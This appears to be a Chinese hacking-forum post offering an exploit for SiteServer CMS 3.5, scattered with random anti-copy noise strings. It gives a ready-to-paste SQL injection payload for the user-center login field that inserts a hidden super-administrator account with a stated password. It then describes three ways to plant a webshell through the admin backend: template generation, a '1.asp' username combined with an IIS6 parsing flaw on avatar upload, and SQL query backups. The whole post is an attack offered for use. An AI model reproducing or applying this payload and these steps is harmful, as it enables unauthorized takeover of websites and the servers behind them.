经测试秒杀最新的3.5版5 k$ u$ q! i- d/ N
stieserver官网:www.siteserver.cn
1 ]9 q+ H& Q# g, U- G, V( iEXP:
% A7 e( V" N" s( a6 n. E: g直接访问UserCenter/login.aspx
6 |* w6 i+ j8 D) z+ L1 T0 u5 ^用户名处输入:: ~; c4 a# ~% {2 q) _7 f2 O
$ l- W/ a! ]' z# ]/ ^1 V% _123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–3 v- v' N% s( @% }
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
" O! j5 G1 E( ]2 F) s0 }( M之后再访问后台SiteServer/login.aspx用插入的用户登陆
% k) b, w$ Z u% }4 E' X. K' J后台拿webshell的三种方法: m/ U/ A4 K! x
一、& C$ j2 Q) B7 f( Q# l, y& ?
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 H+ R- x: M8 ^6 f2 J/ ^% y$ f二、8 T4 {9 s4 e6 o
成员权限-》添加用户-》用户名为:1.asp
/ T8 z6 X% C* }8 O9 C# t% S1 Y* chttp://127.0.0.1/usercenter/
~) K: X1 o8 y" F1 L用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell$ \, Y+ b% n3 V# |* b6 ~! {
(ps:后台添加用户时不会验证是否含有非法字符)' I, w. s: r2 C+ \
三、( {+ A: D, L8 g- e! o
系统工具-》实用工具-》机器参数查看7 B, \) c% x+ @2 t6 l9 a6 h
可以看到数据库类型、名称,WEB路径- V3 _# i% |! L9 M
系统工具-》数据库工具-》SQL语句查询5 Y9 g2 |. t% }% I, [% ^# O
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |